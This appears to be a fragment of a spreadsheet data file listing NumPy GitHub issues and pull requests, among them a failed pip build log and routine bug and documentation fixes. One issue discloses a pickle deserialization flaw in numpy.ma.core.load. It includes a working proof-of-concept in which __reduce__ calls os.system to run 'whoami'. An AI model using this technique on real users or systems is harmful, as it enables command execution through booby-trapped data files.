_x000D_
_x000D_
    blas_opt_info:_x000D_
    blas_mkl_info:_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries mkl_rt not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    blis_info:_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries blis not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    openblas_info:_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries openblas not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
    get_default_fcompiler: matching types: '['gnu', 'intelv', 'absoft', 'compaqv', 'intelev', 'gnu95', 'g95', 'intelvem', 'intelem', 'flang']'_x000D_
    customize GnuFCompiler_x000D_
    Could not locate executable g77_x000D_
    Could not locate executable f77_x000D_
    customize IntelVisualFCompiler_x000D_
    Could not locate executable ifort_x000D_
    Could not locate executable ifl_x000D_
    customize AbsoftFCompiler_x000D_
    Could not locate executable f90_x000D_
    customize CompaqVisualFCompiler_x000D_
    Could not locate executable DF_x000D_
    customize IntelItaniumVisualFCompiler_x000D_
    Could not locate executable efl_x000D_
    customize Gnu95FCompiler_x000D_
    Could not locate executable gfortran_x000D_
    Could not locate executable f95_x000D_
    customize G95FCompiler_x000D_
    Could not locate executable g95_x000D_
    customize IntelEM64VisualFCompiler_x000D_
    customize IntelEM64TFCompiler_x000D_
    Could not locate executable efort_x000D_
    Could not locate executable efc_x000D_
    customize PGroupFlangCompiler_x000D_
    Could not locate executable flang_x000D_
    don't know how to compile Fortran code on platform 'nt'_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    atlas_3_10_blas_threads_info:_x000D_
    Setting PTATLAS=ATLAS_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries tatlas not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    atlas_3_10_blas_info:_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries satlas not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    atlas_blas_threads_info:_x000D_
    Setting PTATLAS=ATLAS_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries ptf77blas,ptcblas,atlas not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    atlas_blas_info:_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries f77blas,cblas,atlas not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    accelerate_info:_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    C:\Users\Leo\AppData\Local\Temp\pip-install-vwlz4sc6\numpy\numpy\distutils\system_info.py:638: UserWarning:_x000D_
        Atlas (http://math-atlas.sourceforge.net/) libraries not found._x000D_
        Directories to search for the libraries can be specified in the_x000D_
        numpy/distutils/site.cfg file (section [atlas]) or by setting_x000D_
        the ATLAS environment variable._x000D_
      self.calc_info()_x000D_
    blas_info:_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries blas not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    C:\Users\Leo\AppData\Local\Temp\pip-install-vwlz4sc6\numpy\numpy\distutils\system_info.py:638: UserWarning:_x000D_
        Blas (http://www.netlib.org/blas/) libraries not found._x000D_
        Directories to search for the libraries can be specified in the_x000D_
        numpy/distutils/site.cfg file (section [blas]) or by setting_x000D_
        the BLAS environment variable._x000D_
      self.calc_info()_x000D_
    blas_src_info:_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    C:\Users\Leo\AppData\Local\Temp\pip-install-vwlz4sc6\numpy\numpy\distutils\system_info.py:638: UserWarning:_x000D_
        Blas (http://www.netlib.org/blas/) sources not found._x000D_
        Directories to search for the sources can be specified in the_x000D_
        numpy/distutils/site.cfg file (section [blas_src]) or by setting_x000D_
        the BLAS_SRC environment variable._x000D_
      self.calc_info()_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    'svnversion' nÆo ‚ reconhecido como um comando interno_x000D_
    ou externo, um programa oper vel ou um arquivo em lotes._x000D_
    non-existing path in 'numpy\\distutils': 'site.cfg'_x000D_
    lapack_opt_info:_x000D_
    lapack_mkl_info:_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries mkl_rt not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    openblas_lapack_info:_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries openblas not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    openblas_clapack_info:_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries openblas,lapack not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    atlas_3_10_threads_info:_x000D_
    Setting PTATLAS=ATLAS_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries tatlas,tatlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_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tatlas,tatlas not found in C:\_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries tatlas,tatlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
    &lt;class 'numpy.distutils.system_info.atlas_3_10_threads_info'&gt;_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    atlas_3_10_info:_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries satlas,satlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_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satlas,satlas not found in C:\_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries satlas,satlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
    &lt;class 'numpy.distutils.system_info.atlas_3_10_info'&gt;_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    atlas_threads_info:_x000D_
    Setting PTATLAS=ATLAS_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries ptf77blas,ptcblas,atlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_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ptf77blas,ptcblas,atlas not found in C:\_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries ptf77blas,ptcblas,atlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
    &lt;class 'numpy.distutils.system_info.atlas_threads_info'&gt;_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    atlas_info:_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries f77blas,cblas,atlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_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f77blas,cblas,atlas not found in C:\_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries f77blas,cblas,atlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
    &lt;class 'numpy.distutils.system_info.atlas_info'&gt;_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    lapack_info:_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    customize MSVCCompiler_x000D_
      libraries lapack not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    C:\Users\Leo\AppData\Local\Temp\pip-install-vwlz4sc6\numpy\numpy\distutils\system_info.py:638: UserWarning:_x000D_
        Lapack (http://www.netlib.org/lapack/) libraries not found._x000D_
        Directories to search for the libraries can be specified in the_x000D_
        numpy/distutils/site.cfg file (section [lapack]) or by setting_x000D_
        the LAPACK environment variable._x000D_
      self.calc_info()_x000D_
    lapack_src_info:_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    C:\Users\Leo\AppData\Local\Temp\pip-install-vwlz4sc6\numpy\numpy\distutils\system_info.py:638: UserWarning:_x000D_
        Lapack (http://www.netlib.org/lapack/) sources not found._x000D_
        Directories to search for the sources can be specified in the_x000D_
        numpy/distutils/site.cfg file (section [lapack_src]) or by setting_x000D_
        the LAPACK_SRC environment variable._x000D_
      self.calc_info()_x000D_
      NOT AVAILABLE_x000D_
_x000D_
    c:\users\leo\appdata\local\programs\python\python38\lib\distutils\dist.py:274: UserWarning: Unknown distribution option: 'define_macros'_x000D_
      warnings.warn(msg)_x000D_
    running install_x000D_
    running build_x000D_
    running config_cc_x000D_
    unifing config_cc, config, build_clib, build_ext, build commands --compiler options_x000D_
    running config_fc_x000D_
    unifing config_fc, config, build_clib, build_ext, build commands --fcompiler options_x000D_
    running build_src_x000D_
    build_src_x000D_
    building py_modules sources_x000D_
    building library "npymath" sources_x000D_
    No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
    error: Microsoft Visual C++ 14.0 is required. Get it with "Microsoft Visual C++ Build Tools": https://visualstudio.microsoft.com/downloads/_x000D_
    ----------------------------------------_x000D_
ERROR: Command "'c:\users\leo\appdata\local\programs\python\python38\python.exe' -u -c 'import setuptools, tokenize;__file__='"'"'C:\\Users\\Leo\\AppData\\Local\\Temp\\pip-install-vwlz4sc6\\numpy\\setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' install --record 'C:\Users\Leo\AppData\Local\Temp\pip-record-2b0a7hf1\install-record.txt' --single-version-externally-managed --compile" failed with error code 1 in C:\Users\Leo\AppData\Local\Temp\pip-install-vwlz4sc6\numpy\`_x000D_
_x000D_
```_x000D_
_x000D_
My setuptools and pip version_x000D_
```_x000D_
pip          19.1.1_x000D_
setuptools   41.0.1_x000D_
```_x000D_
_x000D_
I have a Windows 10 Pro version 1809 with a SSD as my c:/ with my windows and a HD for my file storage, python is installed on c:/_x000D_
</t>
  </si>
  <si>
    <t>Error when installing numpy thru pip on Windows</t>
  </si>
  <si>
    <t>&lt;!--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Fix #11632 by mentioning in the return type that `expand_dims` returns a view.</t>
  </si>
  <si>
    <t>DOC: Mention that expand_dims returns a view</t>
  </si>
  <si>
    <t>Related to #12261</t>
  </si>
  <si>
    <t>DOC: Remove duplicate documentation of the PyArray_SimpleNew family of functions</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #10723._x000D_
_x000D_
Fixes gh-9968_x000D_
_x000D_
Needs tests yet, which I can't write without access to a platform with longdouble having higher precision than double._x000D_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</si>
  <si>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 xml:space="preserve">Backport of #12831._x000D_
_x000D_
Fixes  #10569, maybe._x000D_
_x000D_
## How does the error occur?_x000D_
When I'm compiling scipy with _x000D_
```sh_x000D_
python3 setup.py config --compiler=intelem --fcompiler=intelem build_clib --compiler=intelem --fcompiler=intelem build_ext_x000D_
```_x000D_
, numpy will search for the intel fortran compiler._x000D_
When found, numpy will call_x000D_
```_x000D_
['/opt/intel/compilers_and_libraries_2019.1.144/linux/bin/intel64/ifort', '-FI', '-V', '-c', '/tmp/tmp89hcqec6/qovhj4fn.f', '-o', '/tmp/tmp89hcqec6/qovhj4fn.o']_x000D_
```_x000D_
with `subprocess.check_output` and match the output with the pattern_x000D_
`Intel.*?Fortran.*?(?:%s).*?Version' % (type,)` where `type` is `'EM64T-based|Intel\\(R\\) 64|64|IA-64|64-bit'`._x000D_
However, the output of the version checking command is:_x000D_
```_x000D_
 Intel(R) Fortran 19.0-1560_x000D_
```_x000D_
It doesn't match the pattern and will raise the `CompilerNotFound` error._x000D_
_x000D_
## How does this PR fix it?_x000D_
It seems that the output matching the pattern is in the stderr of the version checking command:_x000D_
```_x000D_
Intel(R) Fortran Intel(R) 64 Compiler for applications running on Intel(R) 64, Version 19.0.1.144 Build 20181018_x000D_
Copyright (C) 1985-2018 Intel Corporation.  All rights reserved._x000D_
```_x000D_
So I re-direct the stderr to stdout and everything work fine._x000D_
_x000D_
## Should I merge this?_x000D_
No, I don't think so._x000D_
This approach affects all the compilers and I have only tested one._x000D_
I think a better approach is to make the `'/tmp/tmp89hcqec6/qovhj4fn.f'` giving output matching the pattern. I wish to help but I know zero about fortran. So I can't help you more._x000D_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</si>
  <si>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BUG: Catch stderr when checking compiler version</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', '08 - Backport', 'component: numpy.distutils']</t>
  </si>
  <si>
    <t xml:space="preserve">Also applies to unstructured_to_structured_x000D_
_x000D_
While producing correct results, the test added in this commit would previously make an unnecessary copy, causing the assertion to fail._x000D_
The cause was `astype` was being asked to convert from a subarray of shape `(x, y)` to one of `(x*y,)`, which it cannot do without making a copy._x000D_
_x000D_
This changes the approach used to skip the step of flattening subarrays to 1d_x000D_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</si>
  <si>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Always return views from structured_to_unstructured when possible</t>
  </si>
  <si>
    <t xml:space="preserve">Ensure log(0.0) doesn't produce inf/nan values when generating random values_x000D_
_x000D_
These are all edge cases where _x000D_
_x000D_
a. Either NaN, inf, or an undefined value are returned.  Each has approx probability 1 in 10**53 of happening_x000D_
b. They all technically change the stream, and so it may be the case that this PR cannot be accepted. This PR only changes the stream for the invalid values, in which case the invalid value is rejected so that the stream is "as-if" the bad value is skipped, and otherwise the same._x000D_
_x000D_
@mattip I'm submitting this so that it can receive some thought since these bugs are all in #13163 . If this is acceptable, then I'll make a PR against the branch._x000D_
_x000D_
@rkern Do you think these are worth fixing?_x000D_
</t>
  </si>
  <si>
    <t>BUG: Protect generators from log(0.0)</t>
  </si>
  <si>
    <t>Fixes #13431._x000D_
_x000D_
There are alternative spellings of `dtype=[('c', '&lt;f8', (2, 5))]`, handle the `dtype=[('c', ('&lt;f8', (5,)), (2,))]` variant.</t>
  </si>
  <si>
    <t>BUG: Handle subarrays in descr_to_dtype</t>
  </si>
  <si>
    <t>Fixes #13429</t>
  </si>
  <si>
    <t>BUG: Add TypeError to accepted exceptions in crackfortran.</t>
  </si>
  <si>
    <t xml:space="preserve">For keyword arguments `kwds`, check that `len(kwds) &gt; 0` rather than `kwds == NULL`_x000D_
to determine if kwargs are passed in (function `arraymultiter_new` does not accept kwargs)_x000D_
_x000D_
Closes gh-13455_x000D_
</t>
  </si>
  <si>
    <t>BUG: Removes ValueError for empty kwargs in arraymultiter_new</t>
  </si>
  <si>
    <t>One of this is a small issue exposed by new warnings, the others are_x000D_
simply adapting our test suit to stricter integer coercion rules_x000D_
(avoiding float -&gt; int conversions)._x000D_
_x000D_
The last one is that we assumed pickle protocl 5 would be in 3.8, but_x000D_
it seems that it did not make the cut._x000D_
_x000D_
Closes gh-13412_x000D_
_x000D_
---_x000D_
_x000D_
Marking as draft, since the pickle 5 protocol was approved for inclusion in 3.8, so I am not sure this is correct or python 3.8a3 is just lagging behind there. @pitrou do you know this quickly?</t>
  </si>
  <si>
    <t>MAINT: Fix errors seen on new python 3.8</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.core', 'component: numpy.random']</t>
  </si>
  <si>
    <t xml:space="preserve">Register the markers 'slow' and 'valgrind' in the `conftest.py` file_x000D_
instead of `pytest.ini` as the latter file is not always present._x000D_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</si>
  <si>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TST: Register markers in conftest.py.</t>
  </si>
  <si>
    <t>['00 - Bug', '05 - Testing']</t>
  </si>
  <si>
    <t xml:space="preserve">Document problems with using `x.nonzero` for indexing, i.e., never use x[y.nonzero()], use x[y.astype(bool)] instead._x000D_
_x000D_
Fixes #13522_x000D_
</t>
  </si>
  <si>
    <t>DOC: Add note to ``nonzero`` docstring.</t>
  </si>
  <si>
    <t>We need to register `valgrind_error` and `slow` as pytest markers to avoid warnings from pytest &gt;= 4.5.0 that are turned into errors.</t>
  </si>
  <si>
    <t>BLD: Make CI pass again with pytest 4.5</t>
  </si>
  <si>
    <t>numpy.ma.core load function with evil data will cause command execution,if attack share evil data on internet,_x000D_
when user load it , it will cause command execution._x000D_
Exploit Author:WangHuan_x000D_
`_x000D_
root@WangHuan:~# cat text.py_x000D_
# coding:utf-8_x000D_
from numpy.ma import core_x000D_
from numpy import __version___x000D_
print(__version__)_x000D_
_x000D_
import os_x000D_
import pickle_x000D_
class Test(object):_x000D_
    def __init__(self):_x000D_
        self.a = 1_x000D_
    def __reduce__(self):_x000D_
        return (os.system,('whoami',))_x000D_
tmpdaa = Test()_x000D_
with open("test-file.pickle",'wb') as f:_x000D_
    pickle.dump(tmpdaa,f)_x000D_
core.load('test-file.pickle')_x000D_
root@WangHuan:~# python text.py _x000D_
1.16.2_x000D_
root_x000D_
`</t>
  </si>
  <si>
    <t>numpy.ma.core load function issue</t>
  </si>
  <si>
    <t>['04 - Documentation', '57 - Close?', 'good first issue']</t>
  </si>
  <si>
    <t>Follows on from gh-6905 which reduced the limit from 2 to 1. Let's go all the way to zero._x000D_
_x000D_
Just as for `broadcast(broadcast(a), b)` is interpreted as `broadcast(a, b)` , this change interprets_x000D_
`broadcast(broadcast(), a)` as `broadcast(a)`._x000D_
_x000D_
Also updates the test to prove that `broadcast` is allowed to be called on a single argument.</t>
  </si>
  <si>
    <t>ENH: Allow broadcast to be called with zero arguments</t>
  </si>
  <si>
    <t>According to the [NumPy C Style Guide](https://www.numpy.org/devdocs/dev/style_guide.html#numpy-modified-pep-0007), "Do not use C++ style // one line comments, they aren’t portable. Note: this will change with the proposed transition to C++." Using `grep "//" numpy/fft/pocketfft.c | wc`, the file `numpy/fft/pocketfft.c` has 69 violations (70 matches but one is a url). Searching all .c and .h files in the repo (via `find . \( -name "*.c" -o -name "*.h" \) | xargs grep "//"`), this file seems to be the only violator. All other instances are urls, contained in C style comments, or in C++ swig headers._x000D_
_x000D_
I am willing to make these changes if they are deemed necessary._x000D_
_x000D_
Output of `grep -n "//" numpy/fft/pocketfft.c`:_x000D_
```_x000D_
41:// adapted from https://stackoverflow.com/questions/42792939/_x000D_
42:// CAUTION: this function only works for arguments in the range [-0.25; 0.25]!_x000D_
125:  for (; i4&lt;=in-i4; ++i, i4+=4) // octant 0_x000D_
129:  for (; i4-in &lt;= 0; ++i, i4+=4) // octant 1_x000D_
134:  for (; i4&lt;=3*in-i4; ++i, i4+=4) // octant 2_x000D_
139:  for (; i&lt;ndone; ++i, i4+=4) // octant 3_x000D_
234:  const double lfp=1.1; // penalty for non-hardcoded larger factors_x000D_
245:    result+= (x&lt;=5) ? x : lfp*x; // penalize larger prime factors_x000D_
805:    // j=0_x000D_
845:  // shuffling and twiddling_x000D_
970:    // factor 2 should be at the front of the factor list_x000D_
1133:      MULPM (dr2,di2,WA(0,i-2),WA(0,i-1),CC(i-1,k,1),CC(i,k,1)) // d2=conj(WA0)*CC1_x000D_
1134:      MULPM (dr3,di3,WA(1,i-2),WA(1,i-1),CC(i-1,k,2),CC(i,k,2)) // d3=conj(WA1)*CC2_x000D_
1135:      double cr2=dr2+dr3; // c add_x000D_
1137:      CH(i-1,0,k) = CC(i-1,k,0)+cr2; // c add_x000D_
1139:      double tr2 = CC(i-1,k,0)+taur*cr2; // c add_x000D_
1141:      double tr3 = taui*(di2-di3);  // t3 = taui*i*(d3-d2)?_x000D_
1143:      PM(CH(i-1,2,k),CH(ic-1,1,k),tr2,tr3) // PM(i) = t2+t3_x000D_
1144:      PM(CH(i  ,2,k),CH(ic  ,1,k),ti3,ti2) // PM(ic) = conj(t2-t3)_x000D_
1254:    for (size_t j=1, jc=ip-1; j&lt;ipph; ++j,--jc)              // 114_x000D_
1258:      for (size_t k=0; k&lt;l1; ++k)                            // 113_x000D_
1262:        for (size_t i=1; i&lt;=ido-2; i+=2)                      // 112_x000D_
1281:  for (size_t j=1, jc=ip-1; j&lt;ipph; ++j,--jc)                // 123_x000D_
1282:    for (size_t k=0; k&lt;l1; ++k)                              // 122_x000D_
1289://everything in C_x000D_
1290://memset(ch,0,ip*l1*ido*sizeof(double));_x000D_
1292:  for (size_t l=1,lc=ip-1; l&lt;ipph; ++l,--lc)                 // 127_x000D_
1294:    for (size_t ik=0; ik&lt;idl1; ++ik)                         // 124_x000D_
1301:    for (; j&lt;ipph-3; j+=4,jc-=4)              // 126_x000D_
1311:      for (size_t ik=0; ik&lt;idl1; ++ik)                       // 125_x000D_
1319:    for (; j&lt;ipph-1; j+=2,jc-=2)              // 126_x000D_
1325:      for (size_t ik=0; ik&lt;idl1; ++ik)                       // 125_x000D_
1331:    for (; j&lt;ipph; ++j,--jc)              // 126_x000D_
1335:      for (size_t ik=0; ik&lt;idl1; ++ik)                       // 125_x000D_
1342:  for (size_t ik=0; ik&lt;idl1; ++ik)                         // 101_x000D_
1344:  for (size_t j=1; j&lt;ipph; ++j)                              // 129_x000D_
1345:    for (size_t ik=0; ik&lt;idl1; ++ik)                         // 128_x000D_
1348:// everything in CH at this point!_x000D_
1349://memset(cc,0,ip*l1*ido*sizeof(double));_x000D_
1351:  for (size_t k=0; k&lt;l1; ++k)                                // 131_x000D_
1352:    for (size_t i=0; i&lt;ido; ++i)                             // 130_x000D_
1355:  for (size_t j=1, jc=ip-1; j&lt;ipph; ++j,--jc)                // 137_x000D_
1358:    for (size_t k=0; k&lt;l1; ++k)                              // 136_x000D_
1367:  for (size_t j=1, jc=ip-1; j&lt;ipph; ++j,--jc)                // 140_x000D_
1370:    for(size_t k=0; k&lt;l1; ++k)                               // 139_x000D_
1371:      for(size_t i=1, ic=ido-i-2; i&lt;=ido-2; i+=2, ic-=2)      // 138_x000D_
1433:      double tr2=CC(i-1,2,k)+CC(ic-1,1,k); // t2=CC(I) + conj(CC(ic))_x000D_
1435:      double cr2=CC(i-1,0,k)+taur*tr2;     // c2=CC +taur*t2_x000D_
1437:      CH(i-1,k,0)=CC(i-1,0,k)+tr2;         // CH=CC+t2_x000D_
1439:      double cr3=taui*(CC(i-1,2,k)-CC(ic-1,1,k));// c3=taui*(CC(i)-conj(CC(ic)))_x000D_
1442:      PM(dr3,dr2,cr2,ci3) // d2= (cr2-ci3, ci2+cr3) = c2+i*c3_x000D_
1443:      PM(di2,di3,ci2,cr3) // d3= (cr2+ci3, ci2-cr3) = c2-i*c3_x000D_
1444:      MULPM(CH(i,k,1),CH(i-1,k,1),WA(0,i-2),WA(0,i-1),di2,dr2) // ch = WA*d2_x000D_
1563:  for (size_t k=0; k&lt;l1; ++k)        // 102_x000D_
1564:    for (size_t i=0; i&lt;ido; ++i)     // 101_x000D_
1566:  for (size_t j=1, jc=ip-1; j&lt;ipph; ++j, --jc)   // 108_x000D_
1578:    for (size_t j=1, jc=ip-1; j&lt;ipph; ++j,--jc)   // 111_x000D_
1582:        for (size_t i=1, ic=ido-i-2; i&lt;=ido-2; i+=2, ic-=2)      // 109_x000D_
1644:  for (size_t j=1, jc=ip-1; j&lt;ipph; ++j,--jc)   // 124_x000D_
1653:  for (size_t j=1, jc=ip-1; j&lt;ipph; ++j, --jc)  // 127_x000D_
1663:// All in CH_x000D_
1785:    // factor 2 should be at the front of the factor list_x000D_
1832:    if (k&lt;plan-&gt;nfct-1) // last factor doesn't need twiddles_x000D_
1842:    if (ip&gt;5) // special factors required by *g functions_x000D_
2089:  if (comp2&lt;comp1) // use Bluestein_x000D_
2115:  // if (plan-&gt;blueplan)_x000D_
2123:  // if (plan-&gt;blueplan)_x000D_
2149:  if (comp2&lt;comp1) // use Bluestein_x000D_
2175:  else // if (plan-&gt;blueplan)_x000D_
2183:  else // if (plan-&gt;blueplan)_x000D_
```</t>
  </si>
  <si>
    <t>DOC: Document that C++ style comments are fine (possibly decide when they are fine)</t>
  </si>
  <si>
    <t>['04 - Documentation', '57 - Close?']</t>
  </si>
  <si>
    <t>Restores the good performance of unpackbits we had since 1.13._x000D_
_x000D_
Closes gh-13537</t>
  </si>
  <si>
    <t>ENH: restore unpack bit lookup table</t>
  </si>
  <si>
    <t xml:space="preserve">[Working with NumPy Source Code](https://docs.scipy.org/doc/numpy/dev/gitwash/index.html) is a valuable reference for both NumPy and SciPy developers. _x000D_
_x000D_
Unfortunately, it doesn't mention "SciPy"/`scipy` at all (as some joint documents, like [NumPy/SciPy Testing Guidelines](https://github.com/numpy/numpy/blob/master/doc/TESTS.rst.txt) and [NumPy Distutils - Users Guide](https://github.com/numpy/numpy/blob/master/doc/DISTUTILS.rst.txt) do), so _new_ SciPy developers don't know how relevant it is. _x000D_
_x000D_
One thought is to change the title to:_x000D_
"Working with NumPy/SciPy source code"_x000D_
and to adjust the [introduction](https://docs.scipy.org/doc/numpy/dev/gitwash/git_intro.html):_x000D_
_x000D_
&gt; These pages describe a git and github workflow for the NumPy and SciPy projects. They were originally written in the context of NumPy, but may be applied to SciPy by replacing all instances of "NumPy"/`numpy` with "SciPy"/`scipy`."_x000D_
_x000D_
(If you can think of any instances where "SciPy"/`scipy` isn't a drop-in replacement, please let me know. I would also modify the text to call those out.)_x000D_
_x000D_
Thoughts? If it sounds OK, I can submit a PR. _x000D_
</t>
  </si>
  <si>
    <t>"Working with NumPy source code" - mention relevance to SciPy?</t>
  </si>
  <si>
    <t xml:space="preserve">* pin pytest version in CI to 4.4_x000D_
until 4.5 issues are resolved_x000D_
</t>
  </si>
  <si>
    <t>TST: pin pytest version</t>
  </si>
  <si>
    <t>BENCH: Modify benchmarks for radix sort.</t>
  </si>
  <si>
    <t>['28 - Benchmark']</t>
  </si>
  <si>
    <t>xref GH-12028_x000D_
_x000D_
